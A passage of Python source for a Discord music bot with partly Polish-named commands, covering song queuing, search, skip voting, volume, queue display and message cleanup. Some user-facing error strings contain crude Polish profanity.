            if self.blacklist.isdisjoint(user.id for user in user_mentions):
                return Response('none of those users are in the blacklist.', reply=True, delete_after=10)
            else:
                self.blacklist.difference_update(user.id for user in user_mentions)
                write_file(self.config.blacklist_file, self.blacklist)
                return Response(
                    '%s users have been removed from the blacklist' % (old_len - len(self.blacklist)),
                    reply=True, delete_after=10
                )
async def cmd_id(self, author, user_mentions):
"""
Usage:
{command_prefix}id [@user]
Tells the user their id or the id of another user.
"""
if not user_mentions:
return Response('your id is `%s`' % author.id, reply=True, delete_after=35)
else:
usr = user_mentions[0]
return Response("%s's id is `%s`" % (usr.name, usr.id), reply=True, delete_after=35)
async def cmd_save(self, player):
"""
Usage:
{command_prefix}save
Saves the current song to the autoplaylist.
"""
if player.current_entry and not isinstance(player.current_entry, StreamPlaylistEntry):
url = player.current_entry.url
if url not in self.autoplaylist:
self.autoplaylist.append(url)
write_file(self.config.auto_playlist_file, self.autoplaylist)
log.debug("Appended {} to autoplaylist".format(url))
return Response('\N{THUMBS UP SIGN}')
else:
raise exceptions.CommandError('Już jest w autoplayliscie.')
else:
raise exceptions.CommandError('There is no valid song playing.')
    @owner_only
    async def cmd_wejdz(self, message, server_link=None):
        """
        Usage:
            {command_prefix}joinserver invite_link
        Asks the bot to join a server. Note: Bot accounts cannot use invite links.
        """
        # Bot accounts cannot accept invites; hand back an OAuth link instead.
        if self.user.bot:
            url = await self.generate_invite_link()
            return Response(
                "Kliknij by dodać mnie na serwer.: \n{}".format(url),
                reply=True, delete_after=30
            )

        try:
            if server_link:
                await self.accept_invite(server_link)
                return Response("\N{THUMBS UP SIGN}")
        except:
            # Any failure from accept_invite is reported as a bad url.
            raise exceptions.CommandError('Invalid URL provided:\n{}\n'.format(server_link), expire_in=30)
async def cmd_play(self, player, channel, author, permissions, leftover_args, song_url):
    """
    Usage:
        {command_prefix}play song_link
        {command_prefix}play text to search for

    Adds the song to the playlist. If a link is not provided, the first
    result from a youtube search is added to the queue. Handles single
    entries, whole playlists, and permission quotas (max_songs,
    max_playlist_length, max_song_length, allow_playlists).
    """
    # Users often wrap links in <> to suppress Discord embeds; strip them.
    song_url = song_url.strip('<>')

    await self.send_typing(channel)

    # A multi-word search query arrives split across leftover_args; rejoin it.
    if leftover_args:
        song_url = ' '.join([song_url, *leftover_args])

    # If the input doesn't look like a URL, escape '/' so it survives as a
    # search string rather than being treated as a path.
    linksRegex = '((http(s)*:[/][/]|www.)([a-z]|[A-Z]|[0-9]|[/.]|[~])*)'
    pattern = re.compile(linksRegex)
    matchUrl = pattern.match(song_url)
    if matchUrl is None:
        song_url = song_url.replace('/', '%2F')

    # Per-user lock so concurrent !play calls from one user serialize and the
    # quota check below can't be raced.
    async with self.aiolocks[_func_() + ':' + author.id]:
        if permissions.max_songs and player.playlist.count_for_user(author) >= permissions.max_songs:
            raise exceptions.PermissionsError(
                "Osiagnales limit requestow debilu zajebany (%s)" % permissions.max_songs, expire_in=30
            )

        # First pass: cheap metadata probe (no download, no processing).
        try:
            info = await self.downloader.extract_info(player.playlist.loop, song_url, download=False, process=False)
        except Exception as e:
            raise exceptions.CommandError(e, expire_in=30)

        if not info:
            raise exceptions.CommandError(
                "Nie umiem grac muzyki smuteg. Try using the {}stream command.".format(self.config.command_prefix),
                expire_in=30
            )

        # abstract the search handling away from the user
        # our ytdl options allow us to use search strings as input urls
        if info.get('url', '').startswith('ytsearch'):
            # print("[Command:play] Searching for \"%s\"" % song_url)
            info = await self.downloader.extract_info(
                player.playlist.loop,
                song_url,
                download=False,
                process=True,    # ASYNC LAMBDAS WHEN
                on_error=lambda e: asyncio.ensure_future(
                    self.safe_send_message(channel, "```\n%s\n```" % e, expire_in=120), loop=self.loop),
                retry_on_error=True
            )

            if not info:
                raise exceptions.CommandError(
                    "No cusz,zjebalo sie. "
                    "Restartuj bota kurwo.", expire_in=30
                )

            if not all(info.get('entries', [])):
                # empty list, no data
                log.debug("Got empty list, no data")
                return

            # Take the first search hit and re-probe it as a direct url.
            # TODO: handle 'webpage_url' being 'ytsearch:...' or extractor type
            song_url = info['entries'][0]['webpage_url']
            info = await self.downloader.extract_info(player.playlist.loop, song_url, download=False, process=False)
            # Now I could just do: return await self.cmd_play(player, channel, author, song_url)
            # But this is probably fine

        # TODO: Possibly add another check here to see about things like the bandcamp issue
        # TODO: Where ytdl gets the generic extractor version with no processing, but finds two different urls

        # 'entries' present means the url resolved to a playlist.
        if 'entries' in info:
            # I have to do exe extra checks anyways because you can request an arbitrary number of search results
            if not permissions.allow_playlists and ':search' in info['extractor'] and len(info['entries']) > 1:
                raise exceptions.PermissionsError("You are not allowed to request playlists", expire_in=30)

            # The only reason we would use this over `len(info['entries'])` is if we add `if _` to this one
            num_songs = sum(1 for _ in info['entries'])

            if permissions.max_playlist_length and num_songs > permissions.max_playlist_length:
                raise exceptions.PermissionsError(
                    "Playlist has too many entries (%s > %s)" % (num_songs, permissions.max_playlist_length),
                    expire_in=30
                )

            # This is a little bit weird when it says (x + 0 > y), I might add the other check back in
            if permissions.max_songs and player.playlist.count_for_user(author) + num_songs > permissions.max_songs:
                raise exceptions.PermissionsError(
                    "Playlist entries + your already queued songs reached limit (%s + %s > %s)" % (
                        num_songs, player.playlist.count_for_user(author), permissions.max_songs),
                    expire_in=30
                )

            # Known bulk extractors get the non-blocking async handler.
            if info['extractor'].lower() in ['youtube:playlist', 'soundcloud:set', 'bandcamp:album']:
                try:
                    return await self._cmd_play_playlist_async(player, channel, author, permissions, song_url, info['extractor'])
                except exceptions.CommandError:
                    raise
                except Exception as e:
                    log.error("Error queuing playlist", exc_info=True)
                    raise exceptions.CommandError("Error queuing playlist:\n%s" % e, expire_in=30)

            t0 = time.time()

            # My test was 1.2 seconds per song, but we maybe should fudge it a bit, unless we can
            # monitor it and edit the message with the estimated time, but that's some ADVANCED SHIT
            # I don't think we can hook into it anyways, so this will have to do.
            # It would probably be a thread to check a few playlists and get the speed from that
            # Different playlists might download at different speeds though
            wait_per_song = 1.2

            procmesg = await self.safe_send_message(
                channel,
                'Gathering playlist information for {} songs{}'.format(
                    num_songs,
                    ', ETA: {} seconds'.format(fixg(
                        num_songs * wait_per_song)) if num_songs >= 10 else '.'))

            # We don't have a pretty way of doing this yet. We need either a loop
            # that sends these every 10 seconds or a nice context manager.
            await self.send_typing(channel)

            # TODO: I can create an event emitter object instead, add event functions, and every play list might be asyncified
            # Also have a "verify_entry" hook with the entry as an arg and returns the entry if its ok
            entry_list, position = await player.playlist.import_from(song_url, channel=channel, author=author)

            tnow = time.time()
            ttime = tnow - t0
            listlen = len(entry_list)
            drop_count = 0

            # Drop any imported entries that exceed the per-song length cap.
            if permissions.max_song_length:
                for e in entry_list.copy():
                    if e.duration > permissions.max_song_length:
                        player.playlist.entries.remove(e)
                        entry_list.remove(e)
                        drop_count += 1
                        # Im pretty sure there's no situation where this would ever break
                        # Unless the first entry starts being played, which would make this a race condition
                if drop_count:
                    print("Dropped %s songs" % drop_count)

            log.info("Processed {} songs in {} seconds at {:.2f}s/song, {:+.2g}/song from expected ({}s)".format(
                listlen,
                fixg(ttime),
                ttime / listlen if listlen else 0,
                ttime / listlen - wait_per_song if listlen - wait_per_song else 0,
                fixg(wait_per_song * num_songs))
            )

            await self.safe_delete_message(procmesg)

            if not listlen - drop_count:
                raise exceptions.CommandError(
                    "No songs were added, all songs were over max duration (%ss)" % permissions.max_song_length,
                    expire_in=30
                )

            reply_text = "Enqueued **%s** songs to be played. Position in queue: %s"
            btext = str(listlen - drop_count)

        else:
            # Single entry path.
            if permissions.max_song_length and info.get('duration', 0) > permissions.max_song_length:
                raise exceptions.PermissionsError(
                    "Song duration exceeds limit (%s > %s)" % (info['duration'], permissions.max_song_length),
                    expire_in=30
                )

            try:
                entry, position = await player.playlist.add_entry(song_url, channel=channel, author=author)

            except exceptions.WrongEntryTypeError as e:
                # ytdl said this was actually a playlist; retry with its suggested url.
                if e.use_url == song_url:
                    log.warning("Determined incorrect entry type, but suggested url is the same. Help.")

                log.debug("Assumed url \"%s\" was a single entry, was actually a playlist" % song_url)
                log.debug("Using \"%s\" instead" % e.use_url)

                return await self.cmd_play(player, channel, author, permissions, leftover_args, e.use_url)

            reply_text = "Enqueued **%s** to be played. Position in queue: %s"
            btext = entry.title

        # Position 1 on a stopped player means it plays immediately.
        if position == 1 and player.is_stopped:
            position = 'Up next!'
            reply_text %= (btext, position)

        else:
            try:
                time_until = await player.playlist.estimate_time_until(position, player)
                reply_text += ' - estimated time until playing: %s'
            except:
                traceback.print_exc()
                time_until = ''

            reply_text %= (btext, position, ftimedelta(time_until))

    return Response(reply_text, delete_after=30)
async def _cmd_play_playlist_async(self, player, channel, author, permissions, playlist_url, extractor_type):
    """
    Secret handler to use the async wizardry to make playlist queuing non-"blocking".

    Processes a bulk playlist url (youtube:playlist, soundcloud:set,
    bandcamp:album) in the background, enforcing max_song_length, and reports
    progress/results in chat.  Raises CommandError on extraction failure or
    when every song was dropped.
    """
    await self.send_typing(channel)
    info = await self.downloader.extract_info(player.playlist.loop, playlist_url, download=False, process=False)

    if not info:
        raise exceptions.CommandError("That playlist cannot be played.")

    num_songs = sum(1 for _ in info['entries'])
    t0 = time.time()

    busymsg = await self.safe_send_message(
        channel, "Processing %s songs..." % num_songs)  # TODO: From playlist_title
    await self.send_typing(channel)

    # FIX: was `entries_added = 0` (an int); `len(entries_added)` below raised
    # TypeError whenever neither branch matched.
    entries_added = []
    # FIX: compare case-insensitively — the caller checks with .lower() but
    # passed the raw extractor string, so a differently-cased extractor fell
    # through both branches.
    if extractor_type.lower() == 'youtube:playlist':
        try:
            entries_added = await player.playlist.async_process_youtube_playlist(
                playlist_url, channel=channel, author=author)
            # TODO: Add hook to be called after each song
            # TODO: Add permissions
        except Exception:
            log.error("Error processing playlist", exc_info=True)
            raise exceptions.CommandError('Error handling playlist %s queuing.' % playlist_url, expire_in=30)

    elif extractor_type.lower() in ['soundcloud:set', 'bandcamp:album']:
        try:
            entries_added = await player.playlist.async_process_sc_bc_playlist(
                playlist_url, channel=channel, author=author)
            # TODO: Add hook to be called after each song
            # TODO: Add permissions
        except Exception:
            log.error("Error processing playlist", exc_info=True)
            raise exceptions.CommandError('Error handling playlist %s queuing.' % playlist_url, expire_in=30)

    songs_processed = len(entries_added)
    drop_count = 0
    skipped = False

    # Drop entries over the per-song duration cap.
    if permissions.max_song_length:
        for e in entries_added.copy():
            if e.duration > permissions.max_song_length:
                try:
                    player.playlist.entries.remove(e)
                    entries_added.remove(e)
                    drop_count += 1
                except ValueError:
                    # FIX: was a bare except; .remove only raises ValueError
                    # when the entry already left the queue (e.g. started playing).
                    pass

        if drop_count:
            log.debug("Dropped %s songs" % drop_count)

        # The entry already playing can't be removed from the queue, so skip it.
        if player.current_entry and player.current_entry.duration > permissions.max_song_length:
            await self.safe_delete_message(self.server_specific_data[channel.server]['last_np_msg'])
            self.server_specific_data[channel.server]['last_np_msg'] = None
            skipped = True
            player.skip()
            # NOTE(review): pops the *last* added entry, which is presumably
            # meant to compensate the skipped current one — confirm intent.
            entries_added.pop()

    await self.safe_delete_message(busymsg)

    songs_added = len(entries_added)
    tnow = time.time()
    ttime = tnow - t0
    wait_per_song = 1.2
    # TODO: actually calculate wait per song in the process function and return that too

    # This is technically inaccurate since bad songs are ignored but still take up time
    log.info("Processed {}/{} songs in {} seconds at {:.2f}s/song, {:+.2g}/song from expected ({}s)".format(
        songs_processed,
        num_songs,
        fixg(ttime),
        ttime / num_songs if num_songs else 0,
        ttime / num_songs - wait_per_song if num_songs - wait_per_song else 0,
        fixg(wait_per_song * num_songs))
    )

    if not songs_added:
        basetext = "No songs were added, all songs were over max duration (%ss)" % permissions.max_song_length
        if skipped:
            basetext += "\nAdditionally, the current song was skipped for being too long."

        raise exceptions.CommandError(basetext, expire_in=30)

    return Response("Enqueued {} songs to be played in {} seconds".format(
        songs_added, fixg(ttime, 1)), delete_after=30)
async def cmd_stream(self, player, channel, author, permissions, song_url):
    """
    Usage:
        {command_prefix}stream song_link

    Enqueue a media stream.
    This could mean an actual stream like Twitch or shoutcast, or simply streaming
    media without predownloading it. Note: FFmpeg is notoriously bad at handling
    streams, especially on poor connections. You have been warned.
    """
    # Strip the <> users add to suppress Discord embeds.
    song_url = song_url.strip('<>')

    # Enforce the per-user queue quota before doing any network work.
    if permissions.max_songs and player.playlist.count_for_user(author) >= permissions.max_songs:
        raise exceptions.PermissionsError(
            "You have reached your enqueued song limit (%s)" % permissions.max_songs, expire_in=30
        )

    await self.send_typing(channel)
    await player.playlist.add_stream_entry(song_url, channel=channel, author=author)

    return Response(":+1:", delete_after=6)
async def cmd_szukaj(self, player, channel, author, permissions, leftover_args):
    """
    Usage:
        {command_prefix}szukaj [service] [number] query

    Searches a service for a video and adds it to the queue.
    - service: any one of the following services:
        - youtube (yt) (default if unspecified)
        - soundcloud (sc)
        - yahoo (yh)
    - number: return a number of video results and waits for user to choose one
      - defaults to 3 if unspecified
      - note: If your search query starts with a number,
              you must put your query in quotes
        - ex: {command_prefix}szukaj 2 "I ran seagulls"
    The command issuer can use reactions to indicate their response to each result.
    """

    if permissions.max_songs and player.playlist.count_for_user(author) > permissions.max_songs:
        raise exceptions.PermissionsError(
            "Osiągnąłeś limit playlisty kutasie. (%s)" % permissions.max_songs,
            expire_in=30
        )

    def argcheck():
        # Called repeatedly as tokens are consumed; a missing query is an error.
        if not leftover_args:
            # noinspection PyUnresolvedReferences
            raise exceptions.CommandError(
                # FIX: was self.cmd_search.__doc__ — that attribute does not
                # exist after the rename, raising AttributeError instead of
                # showing usage.  Reference this command's own docstring.
                "Please specify a search query.\n%s" % dedent(
                    self.cmd_szukaj.__doc__.format(command_prefix=self.config.command_prefix)),
                expire_in=60
            )

    argcheck()

    try:
        leftover_args = shlex.split(' '.join(leftover_args))
    except ValueError:
        raise exceptions.CommandError("Please quote your search query properly.", expire_in=30)

    service = 'youtube'
    items_requested = 3
    max_items = 10  # this can be whatever, but since ytdl uses about 1000, a small number might be better

    services = {
        'youtube': 'ytsearch',
        'soundcloud': 'scsearch',
        'yahoo': 'yvsearch',
        'yt': 'ytsearch',
        'sc': 'scsearch',
        'yh': 'yvsearch'
    }

    # Optional leading service token.
    if leftover_args[0] in services:
        service = leftover_args.pop(0)
        argcheck()

    # Optional result-count token.
    if leftover_args[0].isdigit():
        items_requested = int(leftover_args.pop(0))
        argcheck()

        if items_requested > max_items:
            raise exceptions.CommandError("You cannot search for more than %s videos" % max_items)

    # Strip only the outermost matching quote characters so the inner query
    # text (including embedded quotes) survives intact.
    if leftover_args[0][0] in '\'"':
        lchar = leftover_args[0][0]
        leftover_args[0] = leftover_args[0].lstrip(lchar)
        leftover_args[-1] = leftover_args[-1].rstrip(lchar)

    search_query = '%s%s:%s' % (services[service], items_requested, ' '.join(leftover_args))

    search_msg = await self.send_message(channel, "Searching for videos...")
    await self.send_typing(channel)

    try:
        info = await self.downloader.extract_info(player.playlist.loop, search_query, download=False, process=True)

    except Exception as e:
        await self.safe_edit_message(search_msg, str(e), send_if_fail=True)
        return
    else:
        await self.safe_delete_message(search_msg)

    if not info:
        return Response("No videos found.", delete_after=30)

    # Present results one by one; the issuer reacts to accept/skip/stop.
    for e in info['entries']:
        result_message = await self.safe_send_message(channel, "Result %s/%s: %s" % (
            info['entries'].index(e) + 1, len(info['entries']), e['webpage_url']))

        reactions = ['\u2705', '\U0001F6AB', '\U0001F3C1']
        for r in reactions:
            await self.add_reaction(result_message, r)

        res = await self.wait_for_reaction(reactions, user=author, timeout=30, message=result_message)

        # Timed out: clean up silently.
        if not res:
            await self.safe_delete_message(result_message)
            return

        if res.reaction.emoji == '\u2705':  # check mark: queue this result
            await self.safe_delete_message(result_message)
            await self.cmd_play(player, channel, author, permissions, [], e['webpage_url'])
            return Response("Alright, coming right up!", delete_after=30)
        elif res.reaction.emoji == '\U0001F6AB':  # no-entry: show the next result
            await self.safe_delete_message(result_message)
            continue
        else:  # chequered flag: abort the search
            await self.safe_delete_message(result_message)
            break

    return Response("Oh well \N{SLIGHTLY FROWNING FACE}", delete_after=30)
async def cmd_np(self, player, channel, server, message):
    """
    Usage:
        {command_prefix}np

    Displays the current song in chat.
    """

    if player.current_entry:
        # Delete the previous now-playing message so only one stays visible.
        if self.server_specific_data[server]['last_np_msg']:
            await self.safe_delete_message(self.server_specific_data[server]['last_np_msg'])
            self.server_specific_data[server]['last_np_msg'] = None

        # TODO: Fix timedelta garbage with util function
        song_progress = ftimedelta(timedelta(seconds=player.progress))
        song_total = ftimedelta(timedelta(seconds=player.current_entry.duration))

        # Streams have no meaningful total duration, so only show elapsed time.
        streaming = isinstance(player.current_entry, StreamPlaylistEntry)
        prog_str = ('`[{progress}]`' if streaming else '`[{progress}/{total}]`').format(
            progress=song_progress, total=song_total
        )
        action_text = 'Streaming' if streaming else 'Playing'

        # Include the requester's name when the entry carries author metadata.
        if player.current_entry.meta.get('channel', False) and player.current_entry.meta.get('author', False):
            np_text = "Now {action}: **{title}** added by **{author}** {progress}\n\N{WHITE RIGHT POINTING BACKHAND INDEX} <{url}>".format(
                action=action_text,
                title=player.current_entry.title,
                author=player.current_entry.meta['author'].name,
                progress=prog_str,
                url=player.current_entry.url
            )
        else:
            np_text = "Now {action}: **{title}** {progress}\n\N{WHITE RIGHT POINTING BACKHAND INDEX} <{url}>".format(
                action=action_text,
                title=player.current_entry.title,
                progress=prog_str,
                url=player.current_entry.url
            )

        self.server_specific_data[server]['last_np_msg'] = await self.safe_send_message(channel, np_text)
        await self._manual_delete_check(message)
    else:
        return Response(
            'There are no songs queued! Queue something with {}play.'.format(self.config.command_prefix),
            delete_after=30
        )
async def cmd_dj(self, channel, server, author, voice_channel):
    """
    Usage:
        {command_prefix}dj

    Call the bot to the summoner's voice channel.
    """
    # NOTE(review): the message says "text channel" but the check is for a
    # voice channel — presumably the wording is wrong; confirm before changing.
    if not author.voice_channel:
        raise exceptions.CommandError('NIE JESTES W KANALE TEKSTOWYM!')

    # Already connected on this server: just move to the summoner's channel.
    voice_client = self.voice_client_in(server)
    if voice_client and server == author.voice_channel.server:
        await voice_client.move_to(author.voice_channel)
        return

    # move to _verify_vc_perms?
    chperms = author.voice_channel.permissions_for(server.me)

    if not chperms.connect:
        log.warning("Cannot join channel \"{}\", no permission.".format(author.voice_channel.name))
        return Response(
            "```Cannot join channel \"{}\", no permission.```".format(author.voice_channel.name),
            delete_after=25
        )

    elif not chperms.speak:
        log.warning("Will not join channel \"{}\", no permission to speak.".format(author.voice_channel.name))
        return Response(
            "```Will not join channel \"{}\", no permission to speak.```".format(author.voice_channel.name),
            delete_after=25
        )

    log.info("Joining {0.server.name}/{0.name}".format(author.voice_channel))

    player = await self.get_player(author.voice_channel, create=True, deserialize=self.config.persistent_queue)

    if player.is_stopped:
        player.play()

    # Kick off the autoplaylist if one is configured.
    if self.config.auto_playlist:
        await self.on_player_finished_playing(player)
async def cmd_pauza(self, player):
    """
    Usage:
        {command_prefix}pauza

    Pauses playback of the current song; errors if nothing is playing.
    """
    # Guard clause: pausing only makes sense while something is playing.
    if not player.is_playing:
        raise exceptions.CommandError('Player is not playing.', expire_in=30)

    player.pause()
async def cmd_odpauzuj(self, player):
    """
    Usage:
        {command_prefix}odpauzuj

    Resumes playback of a paused song; errors if the player is not paused.
    """
    # Guard clause: resuming only makes sense from the paused state.
    if not player.is_paused:
        raise exceptions.CommandError('Player is not paused.', expire_in=30)

    player.resume()
async def cmd_mieszaj(self, channel, player):
    """
    Usage:
        {command_prefix}mieszaj

    Shuffles the playlist, with a short card-shuffling animation in chat.
    """
    player.playlist.shuffle()

    # Cosmetic: shuffle the four suit symbols a few times to mimic dealing.
    cards = ['\N{BLACK SPADE SUIT}', '\N{BLACK CLUB SUIT}', '\N{BLACK HEART SUIT}', '\N{BLACK DIAMOND SUIT}']
    random.shuffle(cards)

    hand = await self.send_message(channel, ' '.join(cards))
    await asyncio.sleep(0.6)

    for _ in range(4):
        random.shuffle(cards)
        await self.safe_edit_message(hand, ' '.join(cards))
        await asyncio.sleep(0.6)

    await self.safe_delete_message(hand, quiet=True)
    return Response("\N{OK HAND SIGN}", delete_after=15)
async def cmd_wyjeb(self, player, author):
    """
    Usage:
        {command_prefix}wyjeb

    Clears the playlist.
    """
    player.playlist.clear()
    return Response('\N{PUT LITTER IN ITS PLACE SYMBOL}', delete_after=20)
async def cmd_skip(self, player, channel, author, message, permissions, voice_channel):
    """
    Usage:
        {command_prefix}skip

    Skips the current song when enough votes are cast, or by the bot owner.
    The owner, users with instaskip, and the song's requester skip instantly;
    everyone else contributes one vote toward the configured ratio/threshold.
    """

    if player.is_stopped:
        raise exceptions.CommandError("Can't skip! The player is not playing!", expire_in=20)

    # Nothing currently playing: report on the state of the next entry instead.
    if not player.current_entry:
        if player.playlist.peek():
            if player.playlist.peek()._is_downloading:
                return Response("The next song (%s) is downloading, please wait." % player.playlist.peek().title)

            elif player.playlist.peek().is_downloaded:
                print("The next song will be played shortly. Please wait.")
            else:
                print("Something odd is happening. "
                      "You might want to restart the bot if it doesn't start working.")
        else:
            print("Something strange is happening. "
                  "You might want to restart the bot if it doesn't start working.")

    # Owner, instaskip permission, or the requester of the song: skip instantly.
    if author.id == self.config.owner_id \
            or permissions.instaskip \
            or author == player.current_entry.meta.get('author', None):

        player.skip()  # check autopause stuff here
        await self._manual_delete_check(message)
        return

    # TODO: ignore person if they're deaf or take them out of the list or something?
    # Currently is recounted if they vote, deafen, then vote

    # Count eligible voters: undeafened members excluding the owner and the bot.
    num_voice = sum(1 for m in voice_channel.voice_members if not (
        m.deaf or m.self_deaf or m.id in [self.config.owner_id, self.user.id]))

    num_skips = player.skip_state.add_skipper(author.id, message)

    skips_remaining = min(
        self.config.skips_required,
        # FIX: was `skip_ratio_required / (1 / num_voice)`, which raised
        # ZeroDivisionError when every listener was deaf/excluded; the floor
        # of 1 keeps the math defined and `ratio * n` is the same value.
        math.ceil(self.config.skip_ratio_required * max(num_voice, 1))  # Number of skips from config ratio
    ) - num_skips

    if skips_remaining <= 0:
        player.skip()  # check autopause stuff here
        return Response(
            'your skip for **{}** was acknowledged.'
            '\nThe vote to skip has been passed.{}'.format(
                player.current_entry.title,
                ' Next song coming up!' if player.playlist.peek() else ''
            ),
            reply=True,
            delete_after=20
        )

    else:
        # TODO: When a song gets skipped, delete the old x needed to skip messages
        return Response(
            'your skip for **{}** was acknowledged.'
            '\n**{}** more {} required to vote to skip this song.'.format(
                player.current_entry.title,
                skips_remaining,
                'person is' if skips_remaining == 1 else 'people are'
            ),
            reply=True,
            delete_after=20
        )
async def cmd_volume(self, message, player, new_volume=None):
    """
    Usage:
        {command_prefix}volume (+/-)[volume]

    Sets the playback volume. Accepted values are from 1 to 100.
    Putting + or - before the volume will make the volume change relative to the current volume.
    """
    # No argument: just report the current level.
    if not new_volume:
        return Response('Current volume: `%s%%`' % int(player.volume * 100), reply=True, delete_after=20)

    # A leading sign marks a relative adjustment.
    relative = new_volume[0] in '+-'

    try:
        new_volume = int(new_volume)
    except ValueError:
        raise exceptions.CommandError('{} is not a valid number'.format(new_volume), expire_in=20)

    vol_change = None
    if relative:
        vol_change = new_volume
        new_volume += (player.volume * 100)

    old_volume = int(player.volume * 100)

    # Reject anything outside (0, 100] with a message tailored to the mode.
    if not (0 < new_volume <= 100):
        if relative:
            raise exceptions.CommandError(
                'Unreasonable volume change provided: {}{:+} -> {}%. Provide a change between {} and {:+}.'.format(
                    old_volume, vol_change, old_volume + vol_change, 1 - old_volume, 100 - old_volume), expire_in=20)
        raise exceptions.CommandError(
            'Unreasonable volume provided: {}%. Provide a value between 1 and 100.'.format(new_volume), expire_in=20)

    player.volume = new_volume / 100.0
    return Response('updated volume from %d to %d' % (old_volume, new_volume), reply=True, delete_after=20)
async def cmd_kolejka(self, channel, player):
    """
    Usage:
        {command_prefix}kolejka

    Prints the current song queue, truncated to Discord's message size limit.
    """

    lines = []
    unlisted = 0
    # Worst-case length of the "... and N more" footer, used when budgeting.
    andmoretext = '* ... and %s more*' % ('x' * len(player.playlist.entries))

    if player.current_entry:
        # TODO: Fix timedelta garbage with util function
        song_progress = ftimedelta(timedelta(seconds=player.progress))
        song_total = ftimedelta(timedelta(seconds=player.current_entry.duration))
        prog_str = '`[%s/%s]`' % (song_progress, song_total)

        if player.current_entry.meta.get('channel', False) and player.current_entry.meta.get('author', False):
            lines.append("Currently Playing: **%s** added by **%s** %s\n" % (
                player.current_entry.title, player.current_entry.meta['author'].name, prog_str))
        else:
            lines.append("Now Playing: **%s** %s\n" % (player.current_entry.title, prog_str))

    for i, item in enumerate(player.playlist, 1):
        if item.meta.get('channel', False) and item.meta.get('author', False):
            nextline = '`{}.` **{}** added by **{}**'.format(i, item.title, item.meta['author'].name).strip()
        else:
            nextline = '`{}.` **{}**'.format(i, item.title).strip()

        currentlinesum = sum(len(x) + 1 for x in lines)  # +1 is for newline char

        if currentlinesum + len(nextline) + len(andmoretext) > DISCORD_MSG_CHAR_LIMIT:
            # NOTE(review): this inner condition is a sum of non-negative
            # lengths and is therefore always truthy — once the limit is hit,
            # every remaining entry goes to the "unlisted" count.  Presumably
            # vestigial; confirm before simplifying.
            if currentlinesum + len(andmoretext):
                unlisted += 1
                continue

        lines.append(nextline)

    if unlisted:
        lines.append('\n*... and %s more*' % unlisted)

    if not lines:
        lines.append(
            'There are no songs queued! Queue something with {}play.'.format(self.config.command_prefix))

    message = '\n'.join(lines)
    return Response(message, delete_after=30)
async def cmd_clean(self, message, channel, server, author, search_range=50):
    """
    Usage:
        {command_prefix}clean [range]

    Removes up to [range] messages the bot has posted in chat. Default: 50, Max: 1000
    """

    try:
        float(search_range)  # lazy check
        search_range = min(int(search_range), 1000)
    except:
        return Response("enter a number. NUMBER. That means digits. `15`. Etc.", reply=True, delete_after=8)

    await self.safe_delete_message(message, quiet=True)

    def is_possible_command_invoke(entry):
        # True when the message starts with the command prefix and isn't just
        # the prefix followed by whitespace.
        valid_call = any(
            entry.content.startswith(prefix) for prefix in [self.config.command_prefix])  # can be expanded
        return valid_call and not entry.content[1:2].isspace()

    delete_invokes = True
    # Users with manage_messages (or the owner) may also delete other users'
    # command invocations, not just their own.
    delete_all = channel.permissions_for(author).manage_messages or self.config.owner_id == author.id

    def check(message):
        if is_possible_command_invoke(message) and delete_invokes:
            return delete_all or message.author == author
        return message.author == self.user

    # Bot accounts with manage_messages can bulk-purge in one API call.
    if self.user.bot:
        if channel.permissions_for(server.me).manage_messages:
            deleted = await self.purge_from(channel, check=check, limit=search_range, before=message)
            return Response('Cleaned up {} message{}.'.format(len(deleted), 's' * bool(deleted)), delete_after=15)

    # Fallback: walk history and delete one message at a time, rate-limited.
    deleted = 0
    async for entry in self.logs_from(channel, search_range, before=message):
        # Never delete the tracked now-playing message.
        if entry == self.server_specific_data[channel.server]['last_np_msg']:
            continue

        if entry.author == self.user:
            await self.safe_delete_message(entry)
            deleted += 1
            await asyncio.sleep(0.21)

        if is_possible_command_invoke(entry) and delete_invokes:
            if delete_all or entry.author == author:
                try:
                    await self.delete_message(entry)
                    await asyncio.sleep(0.21)
                    deleted += 1

                except discord.Forbidden:
                    # Lost permission mid-run; stop trying to delete invokes.
                    delete_invokes = False
                except discord.HTTPException:
                    pass

    return Response('Cleaned up {} message{}.'.format(deleted, 's' * bool(deleted)), delete_after=6)
async def cmd_pldump(self, channel, song_url):
    """
    Usage:
        {command_prefix}pldump url

    Dumps the individual urls of a playlist to a text file sent in chat.
    """

    try:
        info = await self.downloader.extract_info(self.loop, song_url.strip('<>'), download=False, process=False)
    except Exception as e:
        raise exceptions.CommandError("Could not extract info from input url\n%s\n" % e, expire_in=25)

    if not info:
        raise exceptions.CommandError("Could not extract info from input url, no data.", expire_in=25)

    if not info.get('entries', None):
        # TODO: Retarded playlist checking
        # set(url, webpageurl).difference(set(url))

        if info.get('url', None) != info.get('webpage_url', info.get('url', None)):
            raise exceptions.CommandError("This does not seem to be a playlist.", expire_in=25)
        else:
            # FIX: was `info.get('')`, which always returned None and crashed
            # on `.strip('<>')` in the recursive call.  Recurse on the resolved
            # url, but bail out when it is missing or identical to the input
            # (that would recurse forever).
            resolved = info.get('url', None)
            if not resolved or resolved == song_url.strip('<>'):
                raise exceptions.CommandError("Could not extract info from input url, no data.", expire_in=25)
            return await self.cmd_pldump(channel, resolved)

    # Per-extractor url builders; unknown extractors map to None.
    linegens = defaultdict(lambda: None, **{
        "youtube": lambda d: 'https://www.youtube.com/watch?v=%s' % d['id'],
        "soundcloud": lambda d: d['url'],
        "bandcamp": lambda d: d['url']
    })

    exfunc = linegens[info['extractor'].split(':')[0]]

    if not exfunc:
        raise exceptions.CommandError("Could not extract info from input url, unsupported playlist type.", expire_in=25)

    with BytesIO() as fcontent:
        for item in info['entries']:
            fcontent.write(exfunc(item).encode('utf8') + b'\n')

        fcontent.seek(0)
        await self.send_file(channel, fcontent, filename='playlist.txt', content="Here's the url dump for <%s>" % song_url)

    return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
async def cmd_listids(self, server, author, leftover_args, cat='all'):
    """
    Usage:
        {command_prefix}listids [categories]

    Lists the ids for various things. Categories are:
       all, users, roles, channels

    The list is sent to the requester as a DM attachment.
    """

    cats = ['channels', 'roles', 'users']

    if cat not in cats and cat != 'all':
        return Response(
            "Valid categories: " + ' '.join(['`%s`' % c for c in cats]),
            reply=True,
            delete_after=25
        )

    if cat == 'all':
        requested_cats = cats
    else:
        # Additional comma-separated categories may follow the first argument.
        requested_cats = [cat] + [c.strip(',') for c in leftover_args]

    data = ['Your ID: %s' % author.id]

    for cur_cat in requested_cats:
        rawudata = None

        if cur_cat == 'users':
            data.append("\nUser IDs:")
